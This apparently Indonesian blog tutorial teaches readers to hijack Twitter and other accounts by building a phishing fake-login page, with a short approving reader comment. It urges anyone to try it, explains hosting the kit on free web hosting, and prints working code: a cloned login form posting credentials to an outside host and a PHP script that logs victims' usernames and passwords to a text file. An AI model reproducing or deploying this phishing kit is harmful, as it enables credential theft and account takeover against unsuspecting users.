Cara yang di lakukan beberapa hacker dadakan untuk menghack account twitter adalah dengan cara fake login atau phising, phising merupakan sebuah jebakan login yang menyerupai halaman login aslinya. Teknik phising bisa dikatakan sebagai teknik hacking yang cukup mudah di lakukan oleh siapapun, anda pun bisa jika mau mencobanya. Bagaimana skema kerja sebuah phising? apakah membuat phising susah? Tidak! Mudah banget..
Phising atau fake login digunakan sebagai alat dan media memancing password target, phising ini bisa di dapatkan di beberapa foum hacker indonesia atau pun browsing dengan keyword “Cara membuat fake login” Skema kerja phising atau fake login adalah merekam dan menyimpan password yang di masukan oleh calon korban untuk mendapatkan akses login ke sebuah account.
Skema kerja phising atau fake login
Phising → Server → Password → Database.
Hacker sudah menyiapkan sebuah jebakan login (Fake Login), Setelah korban memasukan password tersebut, password yang di masukan akan terecord ke server, biasanya berbentuk txt. Password yang dimasukan ke dalam phising, akan otomatis terbaca oleh si hacker, karena sudah di set seperti itu, teknik phising ini hanya menipu calon korban untuk login ke dalam phising, karena halaman login ini menyerupai halaman login aslinya. Ciri utama dari sebuah phising bisa dilihat di Halaman URLnya.
Cara membuat phising.
Apakah sulit membuat phising? cukup mudah, anda pun bisa membuatnya. Setelah anda membuat phising, anda bisa menghack account twitter dan jadilah hacker dadakan. Sebelum anda membuat phising, pastikan anda memiliki sebuah file hosting untuk menyimpan data2 script, anda bisa menggunakan free hosting yang ada di beberapa penyedia file hosting. Contohnya : 000webhost.com. Berikut ini step untuk membuat phising.
Mendaftar di Free Web Hosting, ini akan di jadikan sebagai tempat menyimpan file hosting untuk fake login anda, agar semua file untuk hack. Di File hosting ini akan tampil juga password dari korban anda, hanya butuh 3 file untuk menghack. akan saya jabarkan disini.
Setelah anda melakukan registrasi di sebuah account file hosting, anda bisa menyiapkan beberapa file berikut ini sebagai alat anda menghack sebuah account. Apa file yang di butuhkan?
- Login.php → Halaman Utama Fake Login
- Post.php → Action Post (Untuk merecord password)
- Hasil.txt → File Hasil Password.
1. Halaman utama login, ini tergantung dari phising apa yang ingin anda buat. Misalnya anda ingin membuat jebakan login pada friendster, cukup membuka halaman utama friendster. Setelah membuka halaman utama friendster, anda bisa melihat scipt html friendster dengan menekan tombol CTRL+U . Nanti akan keluar seperti gambar berikut ini : Lihat Script . Copy script tadi dan buat file dengan nama friendster.html.
Atau sebagai contoh mudah, berikut ini adalah kode untuk membuat form login:
<div><label>Password</label>
<form action=”http://kulakalik.com/post.php” method=”post”>
<div style=”margin:0;padding:0;display:inline”><input name=”authenticity_token” type=”hidden” value=”" /></div>
<fieldset>
<label>Username</label>
<div>
<input autocapitalize=”off” autocorrect=”off” name=”username” placeholder=”" type=”text”>
</div>
<div>
<input name=”password” placeholder=”" type=”password” value=”">
</div>
</fieldset>
<span><input name=”commit” type=”submit” value=”Sign in” /></span>
</form>
</div>
Tulisan yang berwana merah, nanti anda rubah dengan file post.php
2. Script Action Post, ini merupakan file untuk merekam password dan username. Anda bisa mengcopy file berikut ini dan memberi nama post.php
Rubah halaman post, script post ini adalah inti dan kunci untuk membuat sebuah fake login, setelah anda membuka file tadi, coba anda cari kode dibawah ini :
<?
$password = $_POST['password'];
$username = $_POST['username'];
$file = "hasil.txt";
$handle = fopen($file, 'a');
fwrite($handle, "=================================================");
fwrite($handle, "\n");
fwrite($handle, "Username: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "=================================================");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo " ";
?><center>
<br><br><br><blink><b>
<a href="http://sangwebmaster.com/hasil.txt"> Lihat hasilnya disini </a>
Copy file di atas dan rubah buat file dengan nama post.php. Nanti tinggal di replace saja kode yang berwarna merah pada bagian yang pertama.
3. hasil hack, setelah file login.php dan file post.php berhasil dibuat, masa anda hanya tinggal membuat file hasil.txt. File ini merupakan file untuk menyimpan username dan password, anda bisa melihat seluruh hasilnya disini. Jangan lupa diberikan permwrite 777.
mantap gan...
ReplyDelete